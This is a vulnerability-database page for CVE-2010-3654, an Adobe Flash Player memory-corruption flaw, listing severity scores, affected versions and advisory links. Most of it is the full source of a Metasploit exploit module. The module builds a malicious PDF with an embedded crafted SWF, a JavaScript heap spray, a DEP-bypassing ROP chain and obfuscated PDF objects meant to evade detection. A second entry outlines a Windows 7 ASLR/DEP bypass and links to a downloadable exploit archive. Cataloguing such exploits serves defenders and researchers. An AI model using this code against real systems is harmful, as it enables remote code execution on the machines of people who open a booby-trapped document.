CVE-2010-3654 : Detail

CVE-2010-3654

Overflow
96.47%V3
Network
2010-10-29
16h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16667

Publication date : 2010-10-31 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player "Button" Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Found being openly exploited 'Haifei Li', # PoC 'jduck' # Metasploit version ], 'Version' => '$Revision: 10857 $', 'References' => [ ['CVE', '2010-3654'], ['OSVDB', '68932'], ['BID', '44504'], ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'], ['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC # For SWF->PDF embedding ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ # Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd [ 'Automatic', { }], ], 'DisclosureDate' => 'Oct 28 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit swf_data = make_swf() js_data = make_js(payload.encoded) # Create the pdf pdf = make_pdf(swf_data, js_data) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def make_swf # load the static swf file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-3654.swf" ) fd = File.open( path, "rb" ) swf_data = fd.read(fd.stat.size) fd.close swf_data end def make_js(encoded_payload) # The following executes a ret2lib using BIB.dll # The effect is to bypass DEP and execute the shellcode in an indirect way stack_data = [ 0xc0c0c0c, 0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx 0xcccccccc, 0xcccccccc, 0xc0c0c0c + 0x10, 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret 0xcccccccc, 0x70048ef, # xchg eax,esp / ret 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] 0xcccccccc, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009033, # ret 0x18 0x7009084, # ret 0xc0c0c0c, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7001599, # pop ebp / ret 0x10124, 0x70072f7, # pop eax / ret 0x10104, 0x70015bb, # pop ecx / ret 0x1000, 0x700154d, # mov [eax], ecx / ret 0x70015bb, # pop ecx / ret 0x7ffe0300, # -- location of KiFastSystemCall 0x7007fb2, # mov eax, [ecx] / ret 0x70015bb, # pop ecx / ret 0x10011, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70015bb, # pop ecx / ret 0x10100, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70072f7, # pop eax / ret 0x10011, 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 0x7005c54, # pop esi / add esp,0x14 / ret 0xffffffff, 0x10100, 0x0, 0x10104, 0x1000, 0x40, # The next bit effectively copies data from the interleaved stack to the memory # pointed to by eax # The data copied is: # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83 # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90 0x700d731, # mov eax, [ebp-0x24] / ret 0x70015bb, # pop ecx / ret 0x9054905a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5815eb5a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x18891a8b, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x8304c083, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xfb8104c2, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xc0c0c0c, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5ebee75, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xffffe6e8, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x909090ff, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90ffffff, 0x700154d, # mov [eax], ecx / ret 0x700d731, # mov eax, [ebp-0x24] / ret 0x700112f # call eax -- (execute stub to transition to full shellcode) ].pack('V*') var_unescape = rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_start = rand_text_alpha(rand(100) + 1) var_s = 0x10000 var_c = rand_text_alpha(rand(100) + 1) var_b = rand_text_alpha(rand(100) + 1) var_d = rand_text_alpha(rand(100) + 1) var_3 = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) var_4 = rand_text_alpha(rand(100) + 1) payload_buf = '' payload_buf << stack_data payload_buf << encoded_payload escaped_payload = Rex::Text.to_unescape(payload_buf) js = %Q| var #{var_unescape} = unescape; var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); #{var_b} += #{var_shellcode}; #{var_b} += #{var_c}; #{var_d} = #{var_b}.substring(0, #{var_s}/2); while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); var #{var_4} = new Array(); for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; | js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(swf, js) swf_name = rand_text_alpha(8 + rand(8)) + ".swf" xref = [] eol = "\n" endobj = "endobj" << eol # Randomize PDF version? pdf = "%PDF-1.5" << eol #pdf << "%" << RandomNonASCIIString(4) << eol # catalog xref << pdf.length pdf << ioDef(1) << nObfu("<</Type/Catalog") pdf << nObfu("/Pages ") << ioRef(3) pdf << nObfu("/OpenAction ") << ioRef(5) pdf << nObfu(">>") pdf << eol << endobj # pages array xref << pdf.length pdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj # page 1 xref << pdf.length pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) pdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ") pdf << nObfu(">>") pdf << eol << endobj # js action xref << pdf.length pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << endobj # swf annotation object xref << pdf.length pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia") pdf << nObfu("/Rect [20 20 187 69] ") pdf << nObfu("/RichMediaSettings ") << ioRef(8) pdf << nObfu("/RichMediaContent ") << ioRef(9) pdf << nObfu("/NM (") << swf_name << nObfu(")") pdf << nObfu(">>") pdf << eol << endobj # rich media settings xref << pdf.length pdf << ioDef(8) pdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash") pdf << nObfu("/Activation ") << ioRef(10) pdf << nObfu("/Deactivation ") << ioRef(11) pdf << nObfu(">>") pdf << eol << endobj # rich media content xref << pdf.length pdf << ioDef(9) pdf << nObfu("<</Type/RichMediaContent") pdf << nObfu("/Assets ") << ioRef(12) pdf << nObfu("/Configurations [") << ioRef(14) << "]" pdf << nObfu(">>") pdf << eol << endobj # rich media activation / deactivation xref << pdf.length pdf << ioDef(10) pdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(11) pdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>") pdf << eol << endobj # rich media assets xref << pdf.length pdf << ioDef(12) pdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>") pdf << eol << endobj # swf embeded file ref xref << pdf.length pdf << ioDef(13) pdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>") pdf << eol << endobj # rich media configuration xref << pdf.length pdf << ioDef(14) pdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash") pdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>") pdf << eol << endobj # rich media isntance xref << pdf.length pdf << ioDef(15) pdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash") pdf << nObfu("/Asset ") << ioRef(13) pdf << nObfu(">>") pdf << eol << endobj # swf stream # NOTE: This data is already compressed, no need to compress it again... xref << pdf.length pdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol pdf << "stream" << eol pdf << swf << eol pdf << "endstream" << eol pdf << endobj # trailing stuff xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol pdf end end
Exploit Database EDB-ID : 17187

Publication date : 2011-04-18 22h00 +00:00
Author : Abysssec
EDB Verified : Yes

Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/ Adobe Flash player Action script type confusion exploit (DEP+ASLR bypass) advisory text : Here is another reliable windows 7 exploit . the main method used for exploitation is based on Haifei-li presentation at CanSecWest. but as exploit code not relased and a lot of peoples like to see exploit code here is our code . exploitation detail : For exploitation purpose on recent protections on windows 7 without any 3rd party (well flash is not 3rd party todays) , it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address. Step1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase. Step2: leak address of the shellcode with the same pointer and NewNumber trick. Step3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string. Step4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object. Note: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable. Here you can get our reliable exploit against windows 7 : calc.exe payload https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip)

Products Mentioned

Configuraton 0

Adobe>>Flash_player >> Version To (including) 10.1.85.3

Adobe>>Flash_player >> Version 6.0.21.0

Adobe>>Flash_player >> Version 6.0.79

Adobe>>Flash_player >> Version 7.0

Adobe>>Flash_player >> Version 7.0.1

Adobe>>Flash_player >> Version 7.0.25

Adobe>>Flash_player >> Version 7.0.63

Adobe>>Flash_player >> Version 7.0.69.0

Adobe>>Flash_player >> Version 7.0.70.0

Adobe>>Flash_player >> Version 7.1

Adobe>>Flash_player >> Version 7.1.1

Adobe>>Flash_player >> Version 7.2

Adobe>>Flash_player >> Version 8.0

Adobe>>Flash_player >> Version 8.0.22.0

Adobe>>Flash_player >> Version 8.0.24.0

Adobe>>Flash_player >> Version 8.0.33.0

Adobe>>Flash_player >> Version 8.0.34.0

Adobe>>Flash_player >> Version 8.0.35.0

Adobe>>Flash_player >> Version 8.0.39.0

Adobe>>Flash_player >> Version 8.0.42.0

Adobe>>Flash_player >> Version 9.0.16

Adobe>>Flash_player >> Version 9.0.18d60

Adobe>>Flash_player >> Version 9.0.20

Adobe>>Flash_player >> Version 9.0.20.0

Adobe>>Flash_player >> Version 9.0.28

Adobe>>Flash_player >> Version 9.0.28.0

Adobe>>Flash_player >> Version 9.0.31

Adobe>>Flash_player >> Version 9.0.31.0

Adobe>>Flash_player >> Version 9.0.45.0

Adobe>>Flash_player >> Version 9.0.47.0

Adobe>>Flash_player >> Version 9.0.48.0

Adobe>>Flash_player >> Version 9.0.112.0

Adobe>>Flash_player >> Version 9.0.114.0

Adobe>>Flash_player >> Version 9.0.115.0

Adobe>>Flash_player >> Version 9.0.124.0

Adobe>>Flash_player >> Version 9.0.125.0

Adobe>>Flash_player >> Version 9.0.151.0

Adobe>>Flash_player >> Version 9.0.152.0

Adobe>>Flash_player >> Version 9.0.159.0

Adobe>>Flash_player >> Version 9.0.246.0

Adobe>>Flash_player >> Version 9.0.260.0

Adobe>>Flash_player >> Version 9.125.0

Adobe>>Flash_player >> Version 10.0.0.584

Adobe>>Flash_player >> Version 10.0.12.10

Adobe>>Flash_player >> Version 10.0.12.36

Adobe>>Flash_player >> Version 10.0.15.3

Adobe>>Flash_player >> Version 10.0.22.87

Adobe>>Flash_player >> Version 10.0.32.18

Adobe>>Flash_player >> Version 10.0.42.34

Adobe>>Flash_player >> Version 10.0.45.2

Adobe>>Flash_player >> Version 10.1.52.14.1

Adobe>>Flash_player >> Version 10.1.52.15

Adobe>>Flash_player >> Version 10.1.53.64

Adobe>>Flash_player >> Version 10.1.82.76

Macromedia>>Flash_player >> Version 5.0

Macromedia>>Flash_player >> Version 5.0_r50

Macromedia>>Flash_player >> Version 6.0

Macromedia>>Flash_player >> Version 6.0.29.0

Macromedia>>Flash_player >> Version 6.0.40.0

Macromedia>>Flash_player >> Version 6.0.47.0

Macromedia>>Flash_player >> Version 6.0.65.0

Macromedia>>Flash_player >> Version 6.0.79.0

Apple>>Mac_os_x >> Version *

Linux>>Linux_kernel >> Version *

Microsoft>>Windows >> Version *

Oracle>>Solaris >> Version *

Configuraton 0

Adobe>>Flash_player >> Version To (including) 10.1.95.2

Adobe>>Flash_player >> Version 6.0.21.0

Adobe>>Flash_player >> Version 6.0.79

Adobe>>Flash_player >> Version 7.0

Adobe>>Flash_player >> Version 7.0.1

Adobe>>Flash_player >> Version 7.0.25

Adobe>>Flash_player >> Version 7.0.63

Adobe>>Flash_player >> Version 7.0.69.0

Adobe>>Flash_player >> Version 7.0.70.0

Adobe>>Flash_player >> Version 7.1

Adobe>>Flash_player >> Version 7.1.1

Adobe>>Flash_player >> Version 7.2

Adobe>>Flash_player >> Version 8.0

Adobe>>Flash_player >> Version 8.0.22.0

Adobe>>Flash_player >> Version 8.0.24.0

Adobe>>Flash_player >> Version 8.0.33.0

Adobe>>Flash_player >> Version 8.0.34.0

Adobe>>Flash_player >> Version 8.0.35.0

Adobe>>Flash_player >> Version 8.0.39.0

Adobe>>Flash_player >> Version 8.0.42.0

Adobe>>Flash_player >> Version 9.0.16

Adobe>>Flash_player >> Version 9.0.18d60

Adobe>>Flash_player >> Version 9.0.20

Adobe>>Flash_player >> Version 9.0.20.0

Adobe>>Flash_player >> Version 9.0.28

Adobe>>Flash_player >> Version 9.0.28.0

Adobe>>Flash_player >> Version 9.0.31

Adobe>>Flash_player >> Version 9.0.31.0

Adobe>>Flash_player >> Version 9.0.45.0

Adobe>>Flash_player >> Version 9.0.47.0

Adobe>>Flash_player >> Version 9.0.48.0

Adobe>>Flash_player >> Version 9.0.112.0

Adobe>>Flash_player >> Version 9.0.114.0

Adobe>>Flash_player >> Version 9.0.115.0

Adobe>>Flash_player >> Version 9.0.124.0

Adobe>>Flash_player >> Version 9.0.125.0

Adobe>>Flash_player >> Version 9.0.151.0

Adobe>>Flash_player >> Version 9.0.152.0

Adobe>>Flash_player >> Version 9.0.159.0

Adobe>>Flash_player >> Version 9.0.246.0

Adobe>>Flash_player >> Version 9.0.260.0

Adobe>>Flash_player >> Version 9.125.0

Adobe>>Flash_player >> Version 10.0.0.584

Adobe>>Flash_player >> Version 10.0.12.10

Adobe>>Flash_player >> Version 10.0.12.36

Adobe>>Flash_player >> Version 10.0.15.3

Adobe>>Flash_player >> Version 10.0.22.87

Adobe>>Flash_player >> Version 10.0.32.18

Adobe>>Flash_player >> Version 10.0.42.34

Adobe>>Flash_player >> Version 10.0.45.2

Adobe>>Flash_player >> Version 10.1.52.14.1

Adobe>>Flash_player >> Version 10.1.52.15

Adobe>>Flash_player >> Version 10.1.53.64

Adobe>>Flash_player >> Version 10.1.82.76

Adobe>>Flash_player >> Version 10.1.85.3

Adobe>>Flash_player >> Version 10.1.92.8

Adobe>>Flash_player >> Version 10.1.92.10

Macromedia>>Flash_player >> Version 5.0

Macromedia>>Flash_player >> Version 5.0_r50

Macromedia>>Flash_player >> Version 6.0

Macromedia>>Flash_player >> Version 6.0.29.0

Macromedia>>Flash_player >> Version 6.0.40.0

Macromedia>>Flash_player >> Version 6.0.47.0

Macromedia>>Flash_player >> Version 6.0.65.0

Macromedia>>Flash_player >> Version 6.0.79.0

Google>>Android >> Version *

Configuraton 0

Adobe>>Acrobat >> Version 9.0

Adobe>>Acrobat >> Version 9.1

Adobe>>Acrobat >> Version 9.1.1

Adobe>>Acrobat >> Version 9.1.2

Adobe>>Acrobat >> Version 9.1.3

Adobe>>Acrobat >> Version 9.2

Adobe>>Acrobat >> Version 9.3

Adobe>>Acrobat >> Version 9.3.1

Adobe>>Acrobat >> Version 9.3.2

Adobe>>Acrobat >> Version 9.3.3

Adobe>>Acrobat >> Version 9.3.4

Adobe>>Acrobat >> Version 9.4

Adobe>>Acrobat_reader >> Version 9.0

Adobe>>Acrobat_reader >> Version 9.1

Adobe>>Acrobat_reader >> Version 9.1.1

Adobe>>Acrobat_reader >> Version 9.1.2

Adobe>>Acrobat_reader >> Version 9.1.3

Adobe>>Acrobat_reader >> Version 9.2

Adobe>>Acrobat_reader >> Version 9.3

Adobe>>Acrobat_reader >> Version 9.3.1

Adobe>>Acrobat_reader >> Version 9.3.2

Adobe>>Acrobat_reader >> Version 9.3.3

Adobe>>Acrobat_reader >> Version 9.3.4

Adobe>>Acrobat_reader >> Version 9.4

References

http://www.vupen.com/english/advisories/2011/0192
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/42183
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT4435
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/42030
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0191
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43025
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0344
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43026
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-201101-09.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2010/2918
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/3111
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/41917
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-201101-08.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.redhat.com/support/errata/RHSA-2010-0834.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id?1024660
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/42926
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0934.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/2903
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2011/0173
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/42401
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.kb.cert.org/vuls/id/298081
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securitytracker.com/id?1024659
Tags : vdb-entry, x_refsource_SECTRACK
http://www.turbolinux.co.jp/security/2011/TLSA-2011-2j.txt
Tags : vendor-advisory, x_refsource_TURBO
http://www.securityfocus.com/bid/44504
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/8210
Tags : third-party-advisory, x_refsource_SREASON
http://www.vupen.com/english/advisories/2010/2906
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2010-0867.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0829.html
Tags : vendor-advisory, x_refsource_REDHAT